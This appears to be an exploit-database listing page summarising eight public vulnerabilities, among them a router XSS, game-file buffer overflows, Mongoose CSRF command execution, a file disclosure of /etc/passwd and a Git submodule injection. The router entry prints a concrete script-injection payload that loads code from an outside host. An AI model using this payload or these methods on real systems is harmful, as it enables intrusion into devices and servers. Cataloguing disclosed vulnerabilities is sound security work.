Explore all Exploits:

XSS persistent on intelbras router with firmware WRN 250

This exploit allows for persistent XSS on Intelbras routers with firmware WRN 250. The vulnerability can be exploited by injecting a malicious script through the URL http://10.0.0.1/userRpm/popupSiteSurveyRpm.htm. The payload used in the exploit is </script><script src='//elb.me'>. This exploit requires the presence of a PHP script to retrieve the logs.

0day Live for speed patch x s2 /s1 and demo local .Spr File buffer over flow

The exploit takes advantage of a buffer overflow vulnerability in the .spr file format used in Live for Speed. By supplying a specially crafted .spr file, an attacker can overwrite the EIP register and execute arbitrary code. This vulnerability is different from the previously discovered buffer overflow in .mpr files. The .spr files are stored in a separate folder and have a different file structure. The exploit code provided can be compiled using Dev C++ 4.9.9.2. Use caution when handling .spr files as they can be used for malicious purposes.

0day Live for speed patch x s2 /s1 and demo local .ply File buffer over flow

The vulnerability occurs in the Live for Speed .ply file format due to an overly long number plate string. By exploiting this issue, an attacker can execute malicious shellcode by convincing a user to put the .ply file inside their misc folder inside of Lfs2. The buffer overflow occurs when the number plate field is filled with over 1000 bytes.

MONGOOSE-WEB-SERVER-v6.5-CSRF-COMMAND-EXECUTION

Remote attackers who can lure a Mongoose web server user into clicking a malicious link or visiting an attacker-controlled web page can execute system commands on the system hosting the Mongoose server. However, if the Mongoose web server is installed as a service, then executing programs, e.g. 'calc.exe', may at times crash or fail to appear, but you may see it in Windows taskmgr.exe. Therefore, from my tests, commands may become unstable when Mongoose is run as a service. When Mongoose is run in standard mode, attackers can potentially modify 'Mongoose.conf' and create arbitrary files on the server, like .PHP etc., to point Mongoose to this as its new 'index' file. Then you need to tell Mongoose its 'access_log_file' is the new attacker-generated file, after injecting commands into the Mongoose web server's log file that will get executed when the log file is later requested. This vulnerability requires a CGI interpreter to be already set, or some information about the target to be known, like the CGI path and language ('pl,php,cgi') used, so that we can set the correct programming language when the file is created during the initial CSRF attack.

YNP Portal System 2.2.0 Remote File Disclosure Vulnerability

The YNP Portal System version 2.2.0 is vulnerable to remote file disclosure. This allows an attacker to access sensitive files on the server by exploiting the 'showpage.cgi' script. By manipulating the 'p' parameter in the URL, an attacker can disclose files outside the web root directory, such as the '/etc/passwd' file.

Malicious Git HTTP Server For CVE-2017-1000117

This module exploits CVE-2017-1000117, which affects Git version 2.7.5 and lower. A submodule of the form 'ssh://' can be passed parameters from the username incorrectly. This can be used to inject commands to the operating system when the submodule is cloned. This module creates a fake git repository which contains a submodule containing the vulnerability. The vulnerability is triggered when the submodules are initialised.

( Microsoft Visual 6 ) VDT70.DLL Stack Overflow Exploit

This exploit targets the VDT70.DLL component in Microsoft Visual Database Tools Database Designer V7.0. It takes advantage of a stack overflow vulnerability to execute arbitrary code. The exploit was discovered by D_7J and developed by the DeltahackingSecurityTEAM. It has been tested on Windows XP Professional SP2 with Internet Explorer 6.

Easy Vedio to PSP Converter 1.6.20 – Local Buffer Overflow (SEH)

The exploit takes advantage of a buffer overflow vulnerability in Easy Vedio to PSP Converter version 1.6.20. By pasting specially crafted content into the 'Enter User Name' field, an attacker can trigger the overflow and gain control of the program's execution flow.

Recent Exploits: